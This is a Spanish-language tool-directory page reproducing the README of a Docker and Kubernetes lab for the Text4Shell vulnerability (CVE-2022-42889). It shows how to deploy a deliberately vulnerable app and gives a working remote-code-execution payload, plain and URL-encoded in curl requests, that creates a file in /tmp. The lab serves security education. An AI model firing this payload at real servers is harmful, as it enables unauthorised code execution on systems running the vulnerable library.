Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
text4shell-cve-2022-42889 — Laboratorio de Kubernetes para CVE-2022-42889 | Kitploit
Herramientas/GitHubGitHub/devenes/text4shell-cve-2022-42889
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotación de Aplicaciones WebSeguridad en la NubeAprendizaje y EducaciónLabs y Práctica
GitHubdevenes/text4shell-cve-2022-42889

text4shell-cve-2022-42889

Laboratorio de Kubernetes para CVE-2022-42889

Ver Repositorio
21hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Text4Shell CVE-2022-42889

Laboratorio Docker para CVE-2022-42889

Puedes construir la imagen Docker localmente o descargar la imagen desde Docker Hub y ejecutar el contenedor.

Clonar el repositorio

root@kitploit:~
git clone https://github.com/devenes/text4shell-cve-2022-42889.git

Construir la imagen Docker localmente

root@kitploit:~
docker build --tag=text4shell .

Ejecutar el contenedor Docker

root@kitploit:~
docker run -d --rm -p 8080:8080 text4shell

O descargar la imagen desde Docker Hub y ejecutar el contenedor

root@kitploit:~
docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0

Probar la aplicación pasando una cadena al parámetro search:

root@kitploit:~
curl http://localhost/text4shell/attack?search=<anything>
  • El ataque se puede realizar pasando una cadena ${prefix:name} donde el prefijo es la búsqueda mencionada anteriormente:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

Ataque usando curl:

root@kitploit:~
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
  • También puedes intentar usar los prefijos dns o url

Obtener el ID del contenedor

root@kitploit:~
docker container ls

Acceder al contenedor

root@kitploit:~
docker exec -it <container_id> bash

Comprobar si el ataque RCE fue exitoso

  • Deberías ver un archivo llamado foo creado en el directorio /tmp:
root@kitploit:~
ls /tmp/

Puedes detener el contenedor ejecutando el siguiente comando

root@kitploit:~
docker container stop <container_id>

Laboratorio Kubernetes para CVE-2022-42889

Cambia al directorio kubernetes y sigue las instrucciones en el archivo README.md.

root@kitploit:~
cd kubernetes

Crear un clúster kind

root@kitploit:~
kind create cluster --config kind-config.yaml

Desplegar la aplicación vulnerable en el clúster

root@kitploit:~
kubectl apply -f deployment.yaml

Crear un servicio para exponer la aplicación

root@kitploit:~
kubectl apply -f service.yaml

Atacar la aplicación vulnerable usando curl

root@kitploit:~
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"

Obtener el nombre del pod usando kubectl get pods

root@kitploit:~
kubectl get pods

Acceder al pod usando kubectl exec

root@kitploit:~
kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash

Comprobar si el ataque fue exitoso

root@kitploit:~
ls /tmp/ | grep foo

Puedes encontrar el tutorial detallado en mi curso de Udemy aquí


Referencias:

  • https://github.com/karthikuj/cve-2022-42889-text4shell-docker
  • https://www.docker.com/blog/security-advisory-cve-2022-42889-text4shell/
  • https://unifiedguru.com/security-advisory-cve-2022-42889-text4shell-docker/
  • https://medium.com/mii-cybersec/cve-2022-42889-text4shell-vulnerability-17b703a48dcd
Descargar herramienta